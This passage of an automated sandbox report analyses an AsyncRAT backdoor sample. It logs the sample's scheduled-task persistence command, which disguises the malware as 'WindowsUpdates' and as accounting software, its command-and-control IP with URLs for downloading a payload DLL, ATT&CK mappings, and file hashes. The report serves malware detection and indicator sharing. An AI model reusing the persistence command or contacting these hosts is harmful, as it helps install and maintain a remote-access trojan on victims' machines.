            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:39 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:40 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:41 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:42 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:44 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:45 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:46 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:47 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:49 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:50 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:51 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:52 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:53 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:55 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:56 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:57 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:01 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:07 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:13 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:17 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:21 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:25 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeQueries volume information: C:\Users\user\Desktop\EGSh5caf8a.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Yara detected AsyncRAT
            Source: Yara matchFile source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: EGSh5caf8a.exe PID: 180, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Scheduled Task/Job            		2
            Scheduled Task/Job            		311
            Process Injection            		1
            Masquerading            		OS Credential Dumping21
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		2
            Scheduled Task/Job            		1
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media11
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		31
            Virtualization/Sandbox Evasion            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
            Obfuscated Files or Information            		LSA Secrets12
            System Information Discovery            		SSHKeylogging1
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Software Packing            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Timestomp            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1428675 Sample: EGSh5caf8a.exe Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 8 other signatures 2->44 7 EGSh5caf8a.exe 15 6 2->7         started        process3 dnsIp4 36 204.12.199.30, 20991, 49708, 49709 WIIUS United States 7->36 34 C:\Users\...\Accounts_Ledger_Software.eXE, PE32 7->34 dropped 46 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->46 48 Uses schtasks.exe or at.exe to add and modify task schedules 7->48 50 Writes to foreign memory regions 7->50 52 2 other signatures 7->52 12 schtasks.exe 1 7->12         started        14 schtasks.exe 1 7->14         started        16 schtasks.exe 1 7->16         started        18 27 other processes 7->18 file5 signatures6 process7 process8 20 conhost.exe 12->20         started        22 conhost.exe 14->22         started        24 conhost.exe 16->24         started        26 conhost.exe 18->26         started        28 conhost.exe 18->28         started        30 conhost.exe 18->30         started        32 24 other processes 18->32

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            EGSh5caf8a.exe50%ReversingLabsWin32.Backdoor.AsyncRAT
            EGSh5caf8a.exe54%VirustotalBrowse

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE50%ReversingLabsWin32.Backdoor.AsyncRAT
            C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE54%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
            https://sectigo.com/CPS00%URL Reputationsafe
            http://schemas.m0%URL Reputationsafe
            http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
            http://ocsp.sectigo.com00%URL Reputationsafe
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
            http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
            http://204.12.199.30:20991/async.txt2%VirustotalBrowse
            http://204.12.199.30:20991/hatthgola.vmp.dll1%VirustotalBrowse
            http://204.12.199.30:209910%VirustotalBrowse
            http://204.12.199.30:20991/hatthgola.vmp.dllC:1%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://204.12.199.30:20991/async.txttrueunknown
            http://204.12.199.30:20991/hatthgola.vmp.dlltrueunknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tEGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://sectigo.com/CPS0EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drfalse
            • URL Reputation: safe
            		unknown
            http://schemas.mschtasks.exe, 00000004.00000002.1218984003.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000022.00000002.1258049891.00000000030C8000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 0000003A.00000002.1281197103.00000000032F8000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yEGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drfalse
            • URL Reputation: safe
            		unknown
            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drfalse
            • URL Reputation: safe
            		unknown
            http://ocsp.sectigo.com0EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drfalse
            • URL Reputation: safe
            		unknown
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drfalse
            • URL Reputation: safe
            		unknown
            http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drfalse
            • URL Reputation: safe
            		unknown
            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.drfalse
            • URL Reputation: safe
            		unknown
            http://204.12.199.30:20991/hatthgola.vmp.dllC:Accounts_Ledger_Software.eXE.0.drfalseunknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameEGSh5caf8a.exe, 00000000.00000002.1314795117.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://204.12.199.30:20991EGSh5caf8a.exe, 00000000.00000002.1314795117.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              http://schemas.microHschtasks.exe, 00000024.00000002.1260760619.0000000002A0B000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                204.12.199.30
                		unknownUnited States
                		32097WIIUStrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1428675
                Start date and time:2024-04-19 11:36:10 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 42s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:70
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:EGSh5caf8a.exe
                renamed because original name is a hash value
                Original Sample Name:712940BAEF78C821E36B8701BF073C52.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@100/3@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 18
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                11:37:00API Interceptor72x Sleep call for process: EGSh5caf8a.exe modified
                11:37:02Task SchedulerRun new task: WindowsUpdates797722446 path: C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                WIIUShttps://held-messages.dariscompany.com/rich.hillyer@dish.com/held-messagesGet hashmaliciousHTMLPhisherBrowse
                • 173.208.137.67
                March 03-31-2024 statement.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 69.30.224.166
                Benefits_Enrollment.htmGet hashmaliciousUnknownBrowse
                • 173.208.137.67
                WxShqWep4r.exeGet hashmaliciousRemcosBrowse
                • 69.30.198.237
                PO881620-2024.docGet hashmaliciousRemcosBrowse
                • 69.30.198.237
                kn328E7C2B.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                • 173.208.242.178
                https://nmefiu.aquarius-care.com/daniel.almodovar@aarcorp.comGet hashmaliciousUnknownBrowse
                • 173.208.137.67
                Omkyhy25l0.elfGet hashmaliciousMiraiBrowse
                • 173.208.146.178
                REijs2IfuB.elfGet hashmaliciousGafgytBrowse
                • 69.197.134.194
                jdY5ClnBFK.elfGet hashmaliciousGafgytBrowse
                • 69.197.134.194

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EGSh5caf8a.exe.log

                Download File
                Process:C:\Users\user\Desktop\EGSh5caf8a.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1250
                Entropy (8bit):5.364365621440192
                Encrypted:false
                SSDEEP:24:MLUE4K5E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4Kzer84j:MIHK5HKlYHKh3owH8tHo6hAHKzervj
                MD5:ABF1CD151DCDEFA700E06EDBE67FA31C
                SHA1:9DCB86A4FC92FFBCDF0B739CB049FED673116123
                SHA-256:37C3377F04DA54703DF63C69424E83AD9B9D2C666B19D579BAF85EBC494B5B6F
                SHA-512:4B7FD3754154DE1FD4A775439ECEB35EF579ED4BEFAC6D26CDBF769BC579FD98FACB53F72182CD8867478D31A4068896A0190B46CEB7AEA04E836CE093C3D94E
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neu

                C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE

                Download File
                Process:C:\Users\user\Desktop\EGSh5caf8a.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):93896
                Entropy (8bit):6.397214733539755
                Encrypted:false
                SSDEEP:1536:qoJFOWbLXbbetrgpFZ2nrWLtyEclopV4c78eiV:zFOWbLLbetrgQn6BpVD34
                MD5:712940BAEF78C821E36B8701BF073C52
                SHA1:D59896B87424FAFC0D00AB5E5C2019BD941167CE
                SHA-256:08F8498AEC75418BB4C12972A6547EE2C4762160E7BF36C558A91B7B9110ED3F
                SHA-512:68BC6DF413E00E6420EE6DB6E4D0497BAB61908B96F48FDB6BF6AAE9BED72DE840D83DFC0017DD24995A05F29B415B82852F84E9B74DE85D303B67CC396C7007
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 50%
                • Antivirus: Virustotal, Detection: 54%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ry...............0..2...........Q... ........@.. ..............................fK....`..................................P..K....`...............F...(...........P............................................... ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............D..............@..B.................P......H........6...............+..`............................................(....*.~....%-.&~..........s....%.....s....%.o....o....*....0..........~....(....(....o.....~.....(....,..*~....(....,..*~....(....-.~....(....o.....(.....i~....X......~.....o.....~....(....~....(.....*..0..I.......(.......+....o....(......X....i2.~......o....%(....s....(.....,.(.......*....0..K.......(....%o.....o....(.....~....(......~.....~...._(....&.~........~....(....&*.(.....1.(....(....(....&(...

                C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE:Zone.Identifier

                Download File
                Process:C:\Users\user\Desktop\EGSh5caf8a.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:false
                Preview:[ZoneTransfer]....ZoneId=0

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):6.397214733539755
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                • Win32 Executable (generic) a (10002005/4) 49.97%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:EGSh5caf8a.exe
                File size:93'896 bytes
                MD5:712940baef78c821e36b8701bf073c52
                SHA1:d59896b87424fafc0d00ab5e5c2019bd941167ce
                SHA256:08f8498aec75418bb4c12972a6547ee2c4762160e7bf36c558a91b7b9110ed3f
                SHA512:68bc6df413e00e6420ee6db6e4d0497bab61908b96f48fdb6bf6aae9bed72de840d83dfc0017dd24995a05f29b415b82852f84e9b74de85d303b67cc396c7007
                SSDEEP:1536:qoJFOWbLXbbetrgpFZ2nrWLtyEclopV4c78eiV:zFOWbLLbetrgQn6BpVD34
                TLSH:D293B4788F89D526F3958CF891F2D69FD4BDA674191AC472EABF89ACC35C7842D12003
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ry...............0..2...........Q... ........@.. ..............................fK....`................................

                File Icon

                Icon Hash:f08c92a8e8f0b245

                Static PE Info

                General

                Entrypoint:0x40510e
                Entrypoint Section:.text
                Digitally signed:true
                Imagebase:0x400000
